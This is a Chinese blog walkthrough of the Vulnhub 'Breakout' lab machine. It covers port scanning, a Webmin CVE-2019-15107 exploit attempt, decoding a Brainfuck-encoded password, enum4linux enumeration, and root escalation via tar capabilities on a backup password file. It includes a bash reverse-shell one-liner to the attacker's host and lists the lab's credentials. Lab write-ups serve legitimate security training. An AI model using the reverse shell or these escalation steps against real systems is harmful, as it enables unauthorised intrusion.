【Vulnhub靶场】Breakout

已于 2022-07-05 11:39:45 修改
阅读量697 收藏 3
点赞数 1
分类专栏: 靶场实战 文章标签: 安全 web安全 网络安全
于 2022-06-17 14:08:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53095382/article/details/125332233
版权

目录

前言

一、信息收集

0x00 arp-scan扫描

0x01 nmap扫描

0x02 dirsearch扫描

二、漏洞利用

0x01 webmin 远程代码漏洞

0x02 Brainfuck

0x03 enum4linux

0x04 反弹shell

0x05 搜集信息

三、提权

0x00 tar利用

 总结

前言

Difficulty: Easy

This box was created to be an Easy box, but it can be Medium if you get lost.

 难度:简单
这个盒子被创建为一个简单的盒子,但如果你迷路了,它可以是中等的。

下载链接

https://download.vulnhub.com/empire/02-Breakout.zip.torrent

环境介绍

kali   192.168.56.102

靶机 :192.168.56.101

一、信息收集

0x00 arp-scan扫描

这个是101,因为开关靶机地址刷新了,没有对截图做变更

arp-scan -I eth1 -l

0x01 nmap扫描

 

https://192.168.56.101:10000
https://192.168.56.101:20000
二者页面一致

 正常页面

0x02 dirsearch扫描

 

二、漏洞利用

0x01 webmin 远程代码漏洞

https://github.com/jas502n/CVE-2019-15107
​
python CVE_2019_15107.py https://192.168.56.101:10000/ "ls"

未发现webmin

0x02 Brainfuck

源码内有Brainfuck 密文

解密:http://www.hiencode.com/brain.html

.2uqPEfj3D<P'a-3

0x03 enum4linux

“enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等
enum4linux -a ip    #做所有简单枚举(-U -S -G -P -r -o -n -i),如果您没有提供任何其他选项,则启用此选项
enum4linux -l ip    #通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DN)
enum4linux -o ip    #获取操作系统信息
enum4linux -r ip    #通过RID循环枚举用户

用户 cyber
​
密码  .2uqPEfj3D<P'a-3

在10000端口登录失败

在20000端口登录成功

利用终端执行命令

0x04 反弹shell

bash -i >& /dev/tcp/192.168.56.102/9001 0>&1

0x05 搜集信息

在/var/backups目录发现old_pass

三、提权

0x00 tar利用

发现tar可执行

利用tar压缩解压该文件获取权限

权限发生改变

查看old_pass的内容,应该为root的密码

Ts&4&YurgtRX(=~h

提权成功

 总结

1、学习到enum4linux的用法。

2、webmin远程代码漏洞【CVE_2019_15107】利用

Ch33syNai1a0
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
matrix-breakout-2-morpheus靶机渗透笔记
qq_60600840的博客
08-09 403
matrix-breakout-2-morpheus靶机、安全、渗透、靶机
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1042
小菜鸡一枚
VulnhubBREAKOUT靶机
qq_63283137的博客
10-10 531
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
2024年网络安全最新【网络安全Vulnhub靶场之matrix-breakout-2-morpheus
最新发布
2401_84281720的博客
05-03 701
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Vulnhub项目:Breakout
Ays.Ie的博客
04-15 390
本篇记录了vulhub靶机:breakout的整个渗透过程,希望能够帮助到有需要的人
【matrix-breakout-2-morpheus】靶场记录
weixin_46411728的博客
02-14 1159
【matrix-breakout-2-morpheus】靶场记录
vulnhub breakout
qq_62144749的博客
08-15 1305
1
Breakout.zip
05-02
学习openGL制作的打砖块游戏。 学习链接:https://learnopengl-cn.github.io/ 文件内容:并不是项目源码,而是生成的exe文件,及其相关的运行时文件,如dll,纹理,音效,shader,关卡等等。 项目仓库:...
breakout_breakout_powerbuilder_
09-30
《PB中的Breakout游戏开发详解》 在信息技术领域,编程游戏是学习编程和软件开发的绝佳途径。"Breakout",又称打砖块,是一款经典的街机游戏,因其简单而富有挑战性的玩法深受程序员喜爱。在PowerBuilder(简称PB)...
breakout-game_前端小游戏_breakout_
10-02
【标题】"breakout-game_前端小游戏_breakout_" 指的是一款利用原生JavaScript编写的打砖块游戏。在Web开发领域,前端小游戏是一种常见的练习项目,它可以帮助开发者提升JavaScript编程技能,同时也能增强对HTML、...
Breakout
03-05
"Breakout"是一款经典的街机游戏,由Atari在1976年发布,由史蒂夫·乔布斯和斯蒂夫·沃兹尼亚克共同设计。游戏的基本概念是玩家控制一块挡板来反弹一个球,目标是消除屏幕上的一系列砖块。这款游戏对后来的许多游戏...
打靶分享:VulnHub-Breakout
weixin_66249173的博客
02-02 1744
最终在/var/backups目录下发现了一个.old_pass.bak看着像个密码,但是没有查看权限,此时我就想到了可以用tar进行压缩再解压,最终得到了一个密码,猜测是root密码。在 Linux 中,文件能力允许进程执行一些超出普通权限的操作,而无需完全的超级用户权限。SMB 协议通常用于在局域网中实现文件和打印机共享,而 Samba 则是 Linux 和其他类 Unix 系统上的一个实现,发现就是个普通的界面,查看源码(这里要仔细查看,并且翻到底。切换时发现会出现失败的情况,所以反弹shell。
Vulnhub靶场实战—matrix-breakout-2-morpheus
weixin_71914594的博客
10-27 256
靶场下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/靶场下载连接: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova攻击机IP:192.168.237.137靶机IP:192.168.237.165。
vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1285
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
vulnhub靶场之Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1325
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 4140
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
Matrix Breakout:2 Morpheus(靶机详细渗透测试过程记录)
m0_63028223的博客
07-12 624
php伪协议读文件,msf提权
Vulnhub靶场之matrix-breakout-2-morpheus
qq_69775412的博客
10-17 595
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus。
Vulnhub靶机:MATRIX-BREAKOUT_ 2 MORPHEUS
LainWith的博客
01-10 1497
(此系列共1台)发布日期:2022 年 7 月 11 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限主机发现端口扫描+漏洞扫描ftp探测分析计划任务日志内核提权。
vulnhub靶场 breakout
08-29
- *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值